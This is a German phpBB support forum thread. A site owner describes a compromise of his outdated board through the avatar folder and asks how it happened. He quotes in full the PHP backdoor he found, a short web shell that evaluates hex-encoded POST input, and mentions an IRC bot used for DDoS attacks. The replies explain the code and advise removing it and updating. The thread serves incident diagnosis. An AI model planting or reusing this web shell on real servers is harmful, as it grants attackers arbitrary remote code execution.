Hallo Leute.
Ich hatte bis vor ein paar Tagen Board Version 16 laufen.
Ich habe den Avatar ordner auf die Rechte 777 gestellt. In dem Ordner schwirren plötzlich php dateien herum. Mit diesen hat dann ein Hacker einen ddos Angriff gemacht. Gibt oder gab es in den letzten Versionen von phpbb einen Bug, mit dem es möglich war, php bzw. zip dateien auf den Server zu laden?
MfG
Fanti
Hacker Angriff
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Re: Hacker Angriff
Fanti hat geschrieben:Ich hatte bis vor ein paar Tagen Board Version 16 laufen.
Dann brauchst du dich nicht wundern wenn bekannte Lücken ausgenutzt werden. Mit 2.0.18 wurde einiges gefixt und produktiv einsetzen sollte man sowieso nur Version 2.0.21. Ein Verzeichnis mit CHMOD 777 stellt immer ein Risiko dar.Kannst du denn inzwischen sagen wie der Täter geschafft hat die PHP-Dateien hochzuladen?
Vielleicht sogar über die Avatar-Upload-Funktion selber. Auch in admin/db_utilities gab es eine Lücke. Ich kann mich da so dunkel an etwas erinnern dass das möglich war. Da müsste ich aber erst selber recherchieren um genaueres sagen zu können.
Die Signatur hat Urlaub.
Es ist ganz komisch gewesen. Im Ordner images/avatar war eine php datei mit folgendem Code:
Was der genau macht, kann mir sicher ein PHP Experte hier sagen.
Dann war ein Unterordner .X indem lag eine zipdatei .zip.
diese war in den ordner . entpackt. dort lag ein irc bot drinnen.
dann hab ich noch im phpbb verzeichnis einen ordner auto_backup. indem lag genau die selbe php datei wie oben. das ist für mich das wundersame, wie die auch hier hin kam.
der ddos angriff stammte wahrscheinlich aus dem avatar ordner, ist aber noch nicht so ganz sicher.
Code: Alles auswählen
<?php
if(isset($HTTP_POST_VARS) && isset($HTTP_POST_VARS['ixjabgre']))
{
eval(pack('H*', $HTTP_POST_VARS['ixjabgre']));
}
else if(isset($_POST) && isset($_POST['ixjabgre']))
{
eval(pack('H*', $_POST['ixjabgre']));
}
?>
Dann war ein Unterordner .X indem lag eine zipdatei .zip.
diese war in den ordner . entpackt. dort lag ein irc bot drinnen.
dann hab ich noch im phpbb verzeichnis einen ordner auto_backup. indem lag genau die selbe php datei wie oben. das ist für mich das wundersame, wie die auch hier hin kam.
der ddos angriff stammte wahrscheinlich aus dem avatar ordner, ist aber noch nicht so ganz sicher.
pack und eval() oder auch vordefinierte Variablen - insbesondere $HTTP_POST_VARS
if und else sind nur einfache Kontrollstrukturen (wenn ... dann ... sonst)
Nun kannst du dir sicher auch denken dass dein Script wohlmöglich böse Absichten verfolgt. Wie das auf deinen Server gekommen ist kann ich allerdings nicht erklären.
Ich hoffe du hast es inzwischen vom Server entfernt und denkst an ein Update deines Forums.
if und else sind nur einfache Kontrollstrukturen (wenn ... dann ... sonst)
Nun kannst du dir sicher auch denken dass dein Script wohlmöglich böse Absichten verfolgt. Wie das auf deinen Server gekommen ist kann ich allerdings nicht erklären.
Ich hoffe du hast es inzwischen vom Server entfernt und denkst an ein Update deines Forums.
Die Signatur hat Urlaub.
Update habe ich gestern gemacht. Das ding muss per Avatarupload raufgekommen sein. Wahrscheinlcih ein Bug vom PHPBB. Danach hat der Hacker den eggdrop installiert und den server als hackingconsole mißbraucht. von august bis heute morgen.
Hier kannst mal sehen was die group so macht:
- Link entfernt -
Hier kannst mal sehen was die group so macht:
- Link entfernt -
Vielleicht könnte dieses Thema noch interessant für dich sein:
http://www.phpbb.de/viewtopic.php?t=120661
http://www.phpbb.de/viewtopic.php?t=120661
Sehr gut möglich, gerade wenn man eine veraltete Version benutzt.Wahrscheinlcih ein Bug vom PHPBB
Die Signatur hat Urlaub.
